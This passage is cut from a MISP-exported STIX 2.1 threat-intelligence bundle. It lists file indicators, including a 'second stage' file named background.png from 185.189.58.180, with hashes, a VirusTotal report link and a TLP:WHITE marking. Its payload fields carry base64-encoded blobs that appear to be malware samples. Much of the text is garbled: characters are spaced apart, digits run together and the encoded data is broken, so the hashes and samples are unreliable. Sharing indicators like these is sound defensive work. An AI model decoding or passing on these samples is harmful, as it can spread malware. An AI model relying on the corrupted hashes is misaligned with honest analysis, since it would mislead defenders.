w T s p 4 H B 4 L + J G J O Q O / T c n t 4 X n o y H N s U q i d q w v V a Y 2 Q D G d w j 0 v v u r N 4e4 Z X v J 8 T g P 7 Z s O t s I H T h P 0 v X 4 T e p W 95 z I 2 / q N q h u Q q T p S 2 j i 4e6 o 6 d A O k y J m n T 0 u 1 h R j 7 r I G U M / w u q E e k F d e H p X 5 e w b B a Z z i R l F v r 5 v 3 j X Q L R Z 87 O o 143 D 59 d s C T z q L a R e K 98 Q K + W A L T J 0 k E 7 S X V j J + J D N D 3 g Y A F B 3 K S O G s T i 7 z Z O s z x h f L k u p X 4 x X t l a 0 d j y z r B + n m K 7 r T N 6 G 1 Y e e V H y u 8 y O I r 3 r D E U m K 43 t 704 X / g I I 3 T 4 s V t 3 K d 21 W u p f w M C v 32 m A h Q 5 N y c b V o b 6 J s Z O 0 b c V i a k 9 w w A / w J i J v l M V 3 X f C q x x 3 i O p B y V 88 T K D n k n K g S w P J p E L n p A F w b W y w f 8 G v I s o S 3 P t Z f 4 F 9 i 1 d o x 63 o y m 6 e k U c / 5 U p g 0 a I h g n R z q a A 93 X 3 o e + F X 6 S O o 3 / d u 3 T d I N 4 + B g N c n t f W O 1 k W N I U x k c V N t T d 6 a t m c D / S 0 H Y 9 c u C N 1 h y 0 O r s 1 M s M 4 W s b C Y + 4 O 4 D k M S X e 
T m L r A 1 v h 0 76 s O E p r M N g R B t W / t K 9 M v N V b 8 t n 24 + F j + w H d Y 41 / 9 l I l q N B 0 F u n x a H 4 W m S 8 n a J d 2 n 7 U l T t s H k L P 4 g 5 s Q M e j S 5 A s t 0 n K 6 c E H 5 L a 7 r B 9 W v N U n 0 E M I + 8 D M Z B 0 W Y 6 x N t 28 a j H / I C f 0 N + 135 g n 3 u + p C o s L t R Z a x d V 7 C u K R k n h T H V k Z J 2 p J d K Y L t J H e p S 5 B 2 P j E Q b c M U s v N B 8396 i R 9 T N w y / 0 F K 1 / I q u + 0 5 G K v R d N T D 7 Y Q T S 0 w X p l R / C h v I K v o J Q E z g L p z j N R g 2 X m u k N h l n T L 3 U k X 8 C 3 h K e B 5 p u f / l 6 T 9 R W i X k R H s W W n i p I 7 Y L w A T q 5 y 4 a u q / 7 r / d T y K n 8 a l U i e n D t / X Y N l b b R T a 1 k f u p 0 Y S s 40 t t 9 A S d v u 5 D V a 6 y S 2 J 3 k n 1 x g x e E E Z h / g H v n p 8 L y 6 S 4 w 9 + h b T Z s I I U x y H S / r Z s s i R g X L x M d b L B j s b Q 0 j X D X e e z 8 t I E g 2 + d z K J 86 N A R U P Q h F / U e p s J n P W r 1 C N 89 q w Q f b v l o f P P G Q O Z F C w p J / Z z 7 I F + g S Y X E u Q K e f z X p e 7 b 0 N 3 N 2 p q 67 N G L w P E q m o 2 q j H l e Q L g Z u T u P N S z 7 P 63 c + 21 J F Z J 7 j t y H a p F i J S R n X 3 r X i 1 B C t n G L n Y u i Y f J B q y K S r j y P z c L F W a 3 Z 0 v C J Q 5 i c c z Z C r F d l o O Z t C i T x N d N f F k V l 0 w N 809 g 5 j N o u Q L x P 8 r 15 s o M / n D L 4 H D O L e F 1 G + N S q e I s q X f b m / q 4 I B C k g W u T R 57 l Z R + Q M 2 V o g / I x D h d 7 f k f S 3 A s 9 + I M L 2 m B D c D G R C t o D 675 I b Q G E N v d q Z W / M F B J k Q F 4 Q p 6 I 1 q 1 m 9 v j F h x L w F x z L h P q C B M s g f Q R F U L t z L t 6 g j 0 T D 53 U Q J f N F f e z t w o 2 G u t T y d l R G y h f + 2 N 1 M 6 w d u o x 47 p d W Y a d 1 k p 8 r 0 s u r G 7 t 45 T G H x q J K q d g E J c z e K r L u i p / 5 k C b L u y J p W o c t / h d h 3 V o I L j e d n B M R + q b 8 G n 8 N g V X k / 48 Z 9 m j c v y S T y V / Z d 5 Y / S 9 a p G J l K C e M b 5 t T I n z z D / r Z T W 3 g i w d q c R F Z Q 42 Y 2 t h / h 
d v S h 1 T h z 46339 J 5 T 0 H p f t e V W b G 9 c P W 86 a w u D z + j K T N D A a V P q + o 5 Q 7 I l f E M i Q M x 4 i Z d y s v Y x 1 U M r d 5 b 4 L / 48 o 4 Z F X v 0 L S q w X 6 o Q E 76 A D S H x I 9 c Z 1 P q w q 0 d n i W 8 w y B I s w r e z f B J d t t X s j 71 S D m 0 k l a + V M 0 / T a W q P z n 8 d 8 a 6 q 4 r + f P Z n s V h U B 2 I O E r D / x B T n Q h l 3 e j P 62 Z d m 0 F h + X r 9 B u w b x K l c R A 8 e x c n A X s d b 9 G s A 0 Q i 6 B d 6 t B P + I l k y p w j O n p G c N P R 0 x 2 B T s E k p O x x z g e V H x Q D Q T K 7 l + I D l x 5 r J I o c C B U x Q p a f g O 4 a i Y 3 Y u Q I D H 3 s C 0 B o m A l j a i m g w h f g i + y y D G n k e G H Q S G 0 N E 5 w G 318 O r M 3 Y 0 M 1 F o 8 R q 8 M D K u m u C g + 3 G w t Q K B c e A N o o q / B p k K 7 z s u a U G x n S j Z Q 0 D e G u M m 1 c 3 r z A k 6 z N / E 77 v N n A K / X i j I K V 6 z 7 J + 8 H N Y V K A k 9 Q O 2 n 2 b w O K 66 f Z f D H q s z G d f n V W 1 H + 8 n s a K H u j a e l d a H G V J B D c w X D X i l 3 E C c Q Z 9 s U J K 76 R A r V 76 D B n 3 K a I n d v 7 v 38 u V 6 U N Q w t / 5 t m B v p M 36 y K B v + q P s n d z m V s I 69 y N a M x 5 O q v q Y 3 m s S F 0 j V X M W E t P K f h X 3 h C N o V R Q y y P 6 e c t R 7 d s G 3 / K i 5 W a 84 q + a N / e K K a S g O c H 5 v k u Z j 26 U h O K e b T Y Z 9 E B H 20 a k X j V U K M t k k x G f y X n D G g 46 Z F N Y M + J h h M L y B m U H 2 U h 1 l 2 x l N K 0 Q i J U / 90 g a 88 O s M Q U k B l u i 1 n 0 3 q E s f i Q k N 26 c 4 q C K U G W W x 6 p S i / I B 52 X f C 7 Z I D W 9 k N X Y O m b b F W T T j U y i G t Q 0 Q 33 H p g S g Y / 0 P a X x D r G x x / v X O V 92 z 5 r J i m p l 0 V 9 I U r d 5 X V d e J q 6097 e v a c n U h E e B 2 e M f b Z N p 1 T H 4 X R P B h J o s v V b e 8 K Z l V p B j H f u I J A D r 0 P m W b V P e Q z x g e 6 I 14 W t 5 a / Z d T A N K W x B u u b F q 9 h l G Q A / f T l v A q u z e u 7 j P y q 1 s p n O B r 6 e d 5 r u 4 n
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T07:02:26Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b547-3fd4-451f-b654-4fec950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T10:21:34.000Z" ,
"modified" : "2018-05-25T10:21:34.000Z" ,
"description" : "2nd stage from 185.189.58.180" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' e 766226346 f 8 d 0 b 0 97 a c 7 c 87 e d b f 605 a ' A N D f i l e : h a s h e s . S H A 1 = ' c 1 d 3 c d 8769 a 71 d d 0e379 c 9727 e c 8443 a 29 c 963 c 5 ' A N D f i l e : h a s h e s . S H A 256 = ' 89 a e d e 2 f 30334329388 a c b 0 864 a 9 c 9e45 d 209 a f 4 b e 47 d 1818 f c 4e23 a c d b 5 c d d d ' A N D f i l e : n a m e = ' b a c k g r o u n d . p n g ' A N D f i l e : s i z e = ' 53575 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A H I 4 u U w 5 Y y f N W p s A A E f R A A A g A B w A Z T c 2 N j I y N j M 0 N m Y 4 Z D B i M D k 3 Y W M 3 Y z g 3 Z W R i Z j Y w N W F V V A k A A 0e1 B 1 t H t Q d b d X g L A A E E I Q A A A A Q h A A A A Z R G r z q G M / h n Z P n o N Y A i X M t o / E U u E S 4 s v A Z J B e l y w U Z Q l w A v h V 7 i k J k V n 5 + x C N e i 0 t K p s 9 p c 79 v c f d O m w o q M s p e l O E Q b R s x h u b T / X x P / C k 7 W 2 w 7 o A N d 6 + z v 6 m t M R n Z p v / b r a n f i N 7 P N Q + Z h 7 E I F C E a W 2 C V 0 Q U g a 3 y n D 6 K V t V E r g S B F 0 E o 323 m 2 n l l C 9 R C b X k 5 a D L X R / c 7 b j 6 G h a n s F E Y + u N z b t h 6 o s t O 7 x i b z + S W 26 e c / M V J k I 6 E w 3 i 0 G A 9 n E v 6 z i q D s B n j l Z g I w 0 P L b b k a + 4 i 2 i p 1 K M 1 R l M H f i 8 C J j U i m M a G 2 C h y X Y 17 z D / m 3 V T 1 f v B q K I W i V j F t O C W Y z J P X i 4 t R 6 H q V Z g 9 B q S a 0 T y t Y + 9 e Y 5 V Q 18 g / 5 X T h a w v 99 t 8 a P 7 A e 4E4 m u p r U Q 0 b F 4 b n 7 V U L p 7 r L w K O 7 X X J 67 Y y I v p L 0 l l o 9 G d m L t S I G K l N e + d 51 t x a 1 V 2 r U / A 6 T J O u 8 R a 4 h W O 5 f g 8 A F A M W 9 W V x 8 H i q Y C t K I r 5 I 33 s 3 I u o L T D L Z 9 l j h i Q B f x 8 j U a V r Y c e t 7 q O 4 R q 4 T D C o Q x a 4 q x + 614 / E J k 7 G N W M D P y i y y z 2 n G O a R v i x w v 4621 x w 1 P x y k W H Y a 9 E V n 48 D Y x p k 1 I 0 N f E Z K G w M x L 4 m Y a 8 h E L f 8 l D 3 T 2 O o Z a v V + 
B i i V m S t 7 K f p r V 0 U g K j N z A x J s N l J Y Z d L m 1 t B W r J x A V e y Y + 2 C k W v r 5 u K b s h 8 h B o L I z W + 3 O U M Q 1 H n m 8 g U V 7 w n w V P 8 R i 0 J f s Y o W 6 q i M z C c V o b G T p y 4 A c l h Y z g 4 I E A d l m 48 R t E V 0 W 6 q J E B o s 5 S y e 15 N M 70 I R d q V d n 65 Z z j 9 Y G 0 U 98e1 D T u a h A V W E Z R K 1 E a 2 h q g Y d Y Z o s 3 f d 0 t G w T J Q R r F o j y G / J 1 i b m n r q L r 0 M W z g h H v z P 4 B L y 7 k e v I 5 x 3E2 o Y o A n g r + o s u e 85 y 2 B T 2 h E e d B c e q B n 5 o n C f Q 9 A X E p I z Z m W / 0 b x B o v A p 9 n l K 4 C P Y R h P f o K 1 + 2 p z g + + Y X f l u V l V 6 w B X S L l k N q O 867 t U S n V U X h g 0 Q Z P x W 9 U F r k W z g Y T K B X K L Y + Y O G Z W z u Y 7 h k n Q Q q W e s s 6 u i V c l H D a W P u h T B b R w z W p y X P Z S A v C F I v V j Y c p D n N Y i e y + 4 O / s 4 J j y x M P S x 71 I v 4 r t A p h i t C 9 p J 13 P l b W K a x H K u r V Y W y a D u V D M + t h T f e W a I Q A H X 4 Q K u c z Y 0 K u p N f g D D 0 J + x L T 77 O P 3 Q c 5 M J p W B x q s v R C 9 L I U 4 n k + 4 U i 0 W v 
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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T10:21:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T10:21:31.000Z" ,
"modified" : "2018-05-25T10:21:31.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
"id" : "relationship--4fbb71a5-2ba8-4049-988f-d6fdbdab8828" ,
"created" : "2018-05-25T10:21:32.000Z" ,
"modified" : "2018-05-25T10:21:32.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--5b07b547-3fd4-451f-b654-4fec950d210f" ,
"target_ref" : "x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}